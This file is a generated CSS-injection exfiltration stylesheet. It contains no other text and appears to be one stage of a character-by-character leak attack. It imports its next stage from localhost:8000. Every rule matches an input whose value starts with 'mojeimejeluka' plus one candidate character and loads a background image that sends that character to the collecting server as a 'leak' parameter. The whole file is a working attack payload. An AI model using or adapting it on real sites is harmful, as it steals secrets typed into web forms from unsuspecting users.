@import url("http://localhost:8000/?l=15");
input[value="mojeimejeluka!"] {background: url("http://localhost:8000/?leak=!&q=0.07984798419234318");}
input[value="mojeimejeluka\""] {background: url("http://localhost:8000/?leak=\"&q=0.6835211756664084");}
input[value="mojeimejeluka#"] {background: url("http://localhost:8000/?leak=#&q=0.906006599486453");}
input[value="mojeimejeluka$"] {background: url("http://localhost:8000/?leak=$&q=0.7180085745252416");}
input[value="mojeimejeluka%"] {background: url("http://localhost:8000/?leak=%&q=0.49748303703470853");}
input[value="mojeimejeluka&"] {background: url("http://localhost:8000/?leak=&&q=0.6065043440602165");}
input[value="mojeimejeluka'"] {background: url("http://localhost:8000/?leak='&q=0.10905015516451377");}
input[value="mojeimejeluka("] {background: url("http://localhost:8000/?leak=(&q=0.5855198151193628");}
input[value="mojeimejeluka)"] {background: url("http://localhost:8000/?leak=)&q=0.6063519855552995");}
input[value="mojeimejeluka*"] {background: url("http://localhost:8000/?leak=*&q=0.5499697328265796");}
input[value="mojeimejeluka+"] {background: url("http://localhost:8000/?leak=+&q=0.7538413644157687");}
input[value="mojeimejeluka,"] {background: url("http://localhost:8000/?leak=,&q=0.12950695200112095");}
input[value="mojeimejeluka-"] {background: url("http://localhost:8000/?leak=-&q=0.6146562983477268");}
input[value="mojeimejeluka."] {background: url("http://localhost:8000/?leak=.&q=0.8837084631352738");}
input[value="mojeimejeluka/"] {background: url("http://localhost:8000/?leak=/&q=0.8635028214479967");}
input[value="mojeimejeluka0"] {background: url("http://localhost:8000/?leak=0&q=0.2658778785912357");}
input[value="mojeimejeluka1"] {background: url("http://localhost:8000/?leak=1&q=0.3584822483589789");}
input[value="mojeimejeluka2"] {background: url("http://localhost:8000/?leak=2&q=0.06841909480874908");}
input[value="mojeimejeluka3"] {background: url("http://localhost:8000/?leak=3&q=0.2151135809609952");}
input[value="mojeimejeluka4"] {background: url("http://localhost:8000/?leak=4&q=0.05446376148016552");}
input[value="mojeimejeluka5"] {background: url("http://localhost:8000/?leak=5&q=0.10996682685857428");}
input[value="mojeimejeluka6"] {background: url("http://localhost:8000/?leak=6&q=0.5673649929173654");}
input[value="mojeimejeluka7"] {background: url("http://localhost:8000/?leak=7&q=0.4271854049170698");}
input[value="mojeimejeluka8"] {background: url("http://localhost:8000/?leak=8&q=0.8110479090687583");}
input[value="mojeimejeluka9"] {background: url("http://localhost:8000/?leak=9&q=0.842833930129417");}
input[value="mojeimejeluka:"] {background: url("http://localhost:8000/?leak=:&q=0.31062022354245444");}
input[value="mojeimejeluka;"] {background: url("http://localhost:8000/?leak=;&q=0.30598842183547403");}
input[value="mojeimejeluka<"] {background: url("http://localhost:8000/?leak=<&q=0.8672060812151872");}
input[value="mojeimejeluka="] {background: url("http://localhost:8000/?leak==&q=0.8593940049816104");}
input[value="mojeimejeluka>"] {background: url("http://localhost:8000/?leak=>&q=0.268364365793601");}
input[value="mojeimejeluka?"] {background: url("http://localhost:8000/?leak=?&q=0.37457299006658995");}
input[value="mojeimejeluka@"] {background: url("http://localhost:8000/?leak=@&q=0.45053606165355586");}
input[value="mojeimejelukaA"] {background: url("http://localhost:8000/?leak=A&q=0.10879696596625599");}
input[value="mojeimejelukaB"] {background: url("http://localhost:8000/?leak=B&q=0.24498015171054832");}
input[value="mojeimejelukaC"] {background: url("http://localhost:8000/?leak=C&q=0.6881654782995548");}
input[value="mojeimejelukaD"] {background: url("http://localhost:8000/?leak=D&q=0.31747184658062455");}
input[value="mojeimejelukaE"] {background: url("http://localhost:8000/?leak=E&q=0.010371878254563871");}
input[value="mojeimejelukaF"] {background: url("http://localhost:8000/?leak=F&q=0.927159515427953");}
input[value="mojeimejelukaG"] {background: url("http://localhost:8000/?leak=G&q=0.3721171207230425");}
input[value="mojeimejelukaH"] {background: url("http://localhost:8000/?leak=H&q=0.4411090634474242");}
input[value="mojeimejelukaI"] {background: url("http://localhost:8000/?leak=I&q=0.4820470205583953");}
input[value="mojeimejelukaJ"] {background: url("http://localhost:8000/?leak=J&q=0.5902686672282595");}
input[value="mojeimejelukaK"] {background: url("http://localhost:8000/?leak=K&q=0.8457510159956212");}
input[value="mojeimejelukaL"] {background: url("http://localhost:8000/?leak=L&q=0.7034602844783513");}
input[value="mojeimejelukaM"] {background: url("http://localhost:8000/?leak=M&q=0.9557925962344727");}
input[value="mojeimejelukaN"] {background: url("http://localhost:8000/?leak=N&q=0.5514642713286328");}
input[value="mojeimejelukaO"] {background: url("http://localhost:8000/?leak=O&q=0.2668315945121149");}
input[value="mojeimejelukaP"] {background: url("http://localhost:8000/?leak=P&q=0.16758043147073542");}
input[value="mojeimejelukaQ"] {background: url("http://localhost:8000/?leak=Q&q=0.7561924252752312");}
input[value="mojeimejelukaR"] {background: url("http://localhost:8000/?leak=R&q=0.6194726192492861");}
input[value="mojeimejelukaS"] {background: url("http://localhost:8000/?leak=S&q=0.09462669853754435");}
input[value="mojeimejelukaT"] {background: url("http://localhost:8000/?leak=T&q=0.5664028043593288");}
input[value="mojeimejelukaU"] {background: url("http://localhost:8000/?leak=U&q=0.6596467931951977");}
input[value="mojeimejelukaV"] {background: url("http://localhost:8000/?leak=V&q=0.054306030771737346");}
input[value="mojeimejelukaW"] {background: url("http://localhost:8000/?leak=W&q=0.9398099821284271");}
input[value="mojeimejelukaX"] {background: url("http://localhost:8000/?leak=X&q=0.6643058913669526");}
input[value="mojeimejelukaY"] {background: url("http://localhost:8000/?leak=Y&q=0.42877060861889893");}
input[value="mojeimejelukaZ"] {background: url("http://localhost:8000/?leak=Z&q=0.10617056002149217");}
input[value="mojeimejeluka["] {background: url("http://localhost:8000/?leak=[&q=0.9297563728376579");}
input[value="mojeimejeluka\\"] {background: url("http://localhost:8000/?leak=\\&q=0.22839425054473028");}
input[value="mojeimejeluka]"] {background: url("http://localhost:8000/?leak=]&q=0.6205488662669776");}
input[value="mojeimejeluka^"] {background: url("http://localhost:8000/?leak=^&q=0.16965165288173267");}
input[value="mojeimejeluka_"] {background: url("http://localhost:8000/?leak=_&q=0.9003187270804878");}
input[value="mojeimejeluka`"] {background: url("http://localhost:8000/?leak=`&q=0.21976977236044082");}
input[value="mojeimejelukaa"] {background: url("http://localhost:8000/?leak=a&q=0.17518491727650232");}
input[value="mojeimejelukab"] {background: url("http://localhost:8000/?leak=b&q=0.9936373304078769");}
input[value="mojeimejelukac"] {background: url("http://localhost:8000/?leak=c&q=0.5692929320625475");}
input[value="mojeimejelukad"] {background: url("http://localhost:8000/?leak=d&q=0.49148248554632");}
input[value="mojeimejelukae"] {background: url("http://localhost:8000/?leak=e&q=0.17608174122357378");}
input[value="mojeimejelukaf"] {background: url("http://localhost:8000/?leak=f&q=0.6500737235242398");}
input[value="mojeimejelukag"] {background: url("http://localhost:8000/?leak=g&q=0.5627302623804282");}
input[value="mojeimejelukah"] {background: url("http://localhost:8000/?leak=h&q=0.404402554564959");}
input[value="mojeimejelukai"] {background: url("http://localhost:8000/?leak=i&q=0.772040419397972");}
input[value="mojeimejelukaj"] {background: url("http://localhost:8000/?leak=j&q=0.6675052992078918");}
input[value="mojeimejelukak"] {background: url("http://localhost:8000/?leak=k&q=0.9771012134026724");}
input[value="mojeimejelukal"] {background: url("http://localhost:8000/?leak=l&q=0.0709625203651072");}
input[value="mojeimejelukam"] {background: url("http://localhost:8000/?leak=m&q=0.031016370741272725");}
input[value="mojeimejelukan"] {background: url("http://localhost:8000/?leak=n&q=0.38922746759799853");}
input[value="mojeimejelukao"] {background: url("http://localhost:8000/?leak=o&q=0.8296268600462655");}
input[value="mojeimejelukap"] {background: url("http://localhost:8000/?leak=p&q=0.4933968832513105");}
input[value="mojeimejelukaq"] {background: url("http://localhost:8000/?leak=q&q=0.574295529916028");}
input[value="mojeimejelukar"] {background: url("http://localhost:8000/?leak=r&q=0.25799914006302394");}
input[value="mojeimejelukas"] {background: url("http://localhost:8000/?leak=s&q=0.853047050615019");}
input[value="mojeimejelukat"] {background: url("http://localhost:8000/?leak=t&q=0.5342224018915698");}
input[value="mojeimejelukau"] {background: url("http://localhost:8000/?leak=u&q=0.4928184811431524");}
input[value="mojeimejelukav"] {background: url("http://localhost:8000/?leak=v&q=0.696500805395978");}
input[value="mojeimejelukaw"] {background: url("http://localhost:8000/?leak=w&q=0.34721039115422636");}
input[value="mojeimejelukax"] {background: url("http://localhost:8000/?leak=x&q=0.0904735907851495");}
input[value="mojeimejelukay"] {background: url("http://localhost:8000/?leak=y&q=0.8665293607427007");}
input[value="mojeimejelukaz"] {background: url("http://localhost:8000/?leak=z&q=0.9948641383619008");}
input[value="mojeimejeluka{"] {background: url("http://localhost:8000/?leak={&q=0.9922580879453997");}
input[value="mojeimejeluka|"] {background: url("http://localhost:8000/?leak=|&q=0.32372375859493174");}
input[value="mojeimejeluka}"] {background: url("http://localhost:8000/?leak=}&q=0.3770835793093168");}
input[value="mojeimejeluka~"] {background: url("http://localhost:8000/?leak=~&q=0.9842435490201444");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.02721328638298548");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.5934629950222261");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.17833359406177984");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.17670402270626662");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.8637695454892877");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.37416080527416873");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.7204268928914972");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.9641009441197865");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.09700800272862531");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.7935781066102092");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.027314985074375686");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.9636125969410532");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.8472683618441981");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.8796701413834616");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.18145168783632437");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.30036139405770834");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.15488053596474582");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.17897634130815887");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.8080160457976149");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.48503460377360774");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.6488416826833612");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.3276531549588013");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.5217819035796887");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.3663113354265779");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.7124172316279251");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.9082625573033158");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.9349016824119598");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.9377580974242401");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.8537796745710833");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.9128513322637617");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.018558986543232514");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.26188204928402037");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=&q=0.416292768929019");}
input[value="mojeimejeluka "] {background: url("http://localhost:8000/?leak= &q=0.44277553643258094");}
input[value="mojeimejeluka¡"] {background: url("http://localhost:8000/?leak=¡&q=0.9189453236438074");}
input[value="mojeimejeluka¢"] {background: url("http://localhost:8000/?leak=¢&q=0.26250114592724483");}
input[value="mojeimejeluka£"] {background: url("http://localhost:8000/?leak=£&q=0.052085602927642416");}
input[value="mojeimejeluka¤"] {background: url("http://localhost:8000/?leak=¤&q=0.6476119897554633");}
input[value="mojeimejeluka¥"] {background: url("http://localhost:8000/?leak=¥&q=0.21381367699527498");}
input[value="mojeimejeluka¦"] {background: url("http://localhost:8000/?leak=¦&q=0.48214549080853875");}
input[value="mojeimejeluka§"] {background: url("http://localhost:8000/?leak=§&q=0.3877527566932861");}
input[value="mojeimejeluka¨"] {background: url("http://localhost:8000/?leak=¨&q=0.04618624900495738");}
input[value="mojeimejeluka©"] {background: url("http://localhost:8000/?leak=©&q=0.7177802422338497");}
input[value="mojeimejelukaª"] {background: url("http://localhost:8000/?leak=ª&q=0.9331718990908624");}
input[value="mojeimejeluka«"] {background: url("http://localhost:8000/?leak=«&q=0.19556904046497592");}
input[value="mojeimejeluka¬"] {background: url("http://localhost:8000/?leak=¬&q=0.45752229632035535");}
input[value="mojeimejeluka­"] {background: url("http://localhost:8000/?leak=­&q=0.4260505018866314");}
input[value="mojeimejeluka®"] {background: url("http://localhost:8000/?leak=®&q=0.05326402295073507");}
input[value="mojeimejeluka¯"] {background: url("http://localhost:8000/?leak=¯&q=0.7024647031673052");}
input[value="mojeimejeluka°"] {background: url("http://localhost:8000/?leak=°&q=0.26245321599482274");}
input[value="mojeimejeluka±"] {background: url("http://localhost:8000/?leak=±&q=0.01417614170529502");}
input[value="mojeimejeluka²"] {background: url("http://localhost:8000/?leak=²&q=0.9696285540640173");}
input[value="mojeimejeluka³"] {background: url("http://localhost:8000/?leak=³&q=0.611258707229988");}
input[value="mojeimejeluka´"] {background: url("http://localhost:8000/?leak=´&q=0.4975918689668708");}
input[value="mojeimejelukaµ"] {background: url("http://localhost:8000/?leak=µ&q=0.37897592924651624");}
input[value="mojeimejeluka¶"] {background: url("http://localhost:8000/?leak=¶&q=0.47512130518316376");}
input[value="mojeimejeluka·"] {background: url("http://localhost:8000/?leak=·&q=0.5272864603639029");}
input[value="mojeimejeluka¸"] {background: url("http://localhost:8000/?leak=¸&q=0.8856003492737186");}
input[value="mojeimejeluka¹"] {background: url("http://localhost:8000/?leak=¹&q=0.6040547766391806");}
input[value="mojeimejelukaº"] {background: url("http://localhost:8000/?leak=º&q=0.4481600303399449");}
input[value="mojeimejeluka»"] {background: url("http://localhost:8000/?leak=»&q=0.7235444915849503");}
input[value="mojeimejeluka¼"] {background: url("http://localhost:8000/?leak=¼&q=0.8413026120547833");}
input[value="mojeimejeluka½"] {background: url("http://localhost:8000/?leak=½&q=0.9998494827232329");}
input[value="mojeimejeluka¾"] {background: url("http://localhost:8000/?leak=¾&q=0.8428918472250859");}
input[value="mojeimejeluka¿"] {background: url("http://localhost:8000/?leak=¿&q=0.1518433594606361");}
input[value="mojeimejelukaÀ"] {background: url("http://localhost:8000/?leak=À&q=0.5246143596385637");}
input[value="mojeimejelukaÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.9228795253556172");}
input[value="mojeimejelukaÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.19043088777370776");}
input[value="mojeimejelukaÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.8626012642910135");}
input[value="mojeimejelukaÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.8247070451082663");}
input[value="mojeimejelukaÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.29209322286484807");}
input[value="mojeimejelukaÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.2762423376961767");}
input[value="mojeimejelukaÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.29790999649646244");}
input[value="mojeimejelukaÈ"] {background: url("http://localhost:8000/?leak=È&q=0.9027867454916871");}
input[value="mojeimejelukaÉ"] {background: url("http://localhost:8000/?leak=É&q=0.1202233464561453");}
input[value="mojeimejelukaÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.1747024100944532");}
input[value="mojeimejelukaË"] {background: url("http://localhost:8000/?leak=Ë&q=0.62762362487917");}
input[value="mojeimejelukaÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.1369809295310389");}
input[value="mojeimejelukaÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.9663513366423959");}
input[value="mojeimejelukaÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.5989560207734808");}
input[value="mojeimejelukaÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.2921367641133017");}
input[value="mojeimejelukaÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.575521579209676");}
input[value="mojeimejelukaÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.07790225004099627");}
input[value="mojeimejelukaÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.4211816935066053");}
input[value="mojeimejelukaÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.6377555615876465");}
input[value="mojeimejelukaÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.9464822164286375");}
input[value="mojeimejelukaÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.387474307456839");}
input[value="mojeimejelukaÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.6440661941292869");}
input[value="mojeimejeluka×"] {background: url("http://localhost:8000/?leak=×&q=0.37774993559138115");}
input[value="mojeimejelukaØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.6308254998538663");}
input[value="mojeimejelukaÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.7624081951257271");}
input[value="mojeimejelukaÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.335043932119633");}
input[value="mojeimejelukaÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.7217165255799249");}
input[value="mojeimejelukaÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.5460259629917394");}
input[value="mojeimejelukaÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.6307997750132657");}
input[value="mojeimejelukaÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.3513677985454815");}
input[value="mojeimejelukaß"] {background: url("http://localhost:8000/?leak=ß&q=0.021416694928016566");}
input[value="mojeimejelukaà"] {background: url("http://localhost:8000/?leak=à&q=0.8748101929274301");}
input[value="mojeimejelukaá"] {background: url("http://localhost:8000/?leak=á&q=0.5085885035363875");}
input[value="mojeimejelukaâ"] {background: url("http://localhost:8000/?leak=â&q=0.8591287960847647");}
input[value="mojeimejelukaã"] {background: url("http://localhost:8000/?leak=ã&q=0.10048588875486941");}
input[value="mojeimejelukaä"] {background: url("http://localhost:8000/?leak=ä&q=0.38291789838722035");}
input[value="mojeimejelukaå"] {background: url("http://localhost:8000/?leak=å&q=0.6513096544617769");}
input[value="mojeimejelukaæ"] {background: url("http://localhost:8000/?leak=æ&q=0.6616072531394184");}
input[value="mojeimejelukaç"] {background: url("http://localhost:8000/?leak=ç&q=0.8133800570266065");}
input[value="mojeimejelukaè"] {background: url("http://localhost:8000/?leak=è&q=0.862162311207223");}
input[value="mojeimejelukaé"] {background: url("http://localhost:8000/?leak=é&q=0.9224176272812283");}
input[value="mojeimejelukaê"] {background: url("http://localhost:8000/?leak=ê&q=0.9949599444867614");}
input[value="mojeimejelukaë"] {background: url("http://localhost:8000/?leak=ë&q=0.7693647484141897");}
input[value="mojeimejelukaì"] {background: url("http://localhost:8000/?leak=ì&q=0.2545861594608212");}
input[value="mojeimejelukaí"] {background: url("http://localhost:8000/?leak=í&q=0.4580291624893067");}
input[value="mojeimejelukaî"] {background: url("http://localhost:8000/?leak=î&q=0.7884753480312181");}
input[value="mojeimejelukaï"] {background: url("http://localhost:8000/?leak=ï&q=0.7213590933583987");}
input[value="mojeimejelukað"] {background: url("http://localhost:8000/?leak=ð&q=0.2686882416245482");}
input[value="mojeimejelukañ"] {background: url("http://localhost:8000/?leak=ñ&q=0.016470145214483534");}
input[value="mojeimejelukaò"] {background: url("http://localhost:8000/?leak=ò&q=0.7188686241236306");}
input[value="mojeimejelukaó"] {background: url("http://localhost:8000/?leak=ó&q=0.9404359164793681");}
input[value="mojeimejelukaô"] {background: url("http://localhost:8000/?leak=ô&q=0.02978245106453903");}
input[value="mojeimejelukaõ"] {background: url("http://localhost:8000/?leak=õ&q=0.9003540623205926");}
input[value="mojeimejelukaö"] {background: url("http://localhost:8000/?leak=ö&q=0.9072135701171984");}
input[value="mojeimejeluka÷"] {background: url("http://localhost:8000/?leak=÷&q=0.17251421595198968");}
input[value="mojeimejelukaø"] {background: url("http://localhost:8000/?leak=ø&q=0.31067252700674364");}
input[value="mojeimejelukaù"] {background: url("http://localhost:8000/?leak=ù&q=0.9114553751938634");}
input[value="mojeimejelukaú"] {background: url("http://localhost:8000/?leak=ú&q=0.8212786652460433");}
input[value="mojeimejelukaû"] {background: url("http://localhost:8000/?leak=û&q=0.8585872469543989");}
input[value="mojeimejelukaü"] {background: url("http://localhost:8000/?leak=ü&q=0.6880794880346786");}
input[value="mojeimejelukaý"] {background: url("http://localhost:8000/?leak=ý&q=0.8913332298845564");}
input[value="mojeimejelukaþ"] {background: url("http://localhost:8000/?leak=þ&q=0.06556581057087985");}
input[value="mojeimejelukaÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.09911048177525461");}
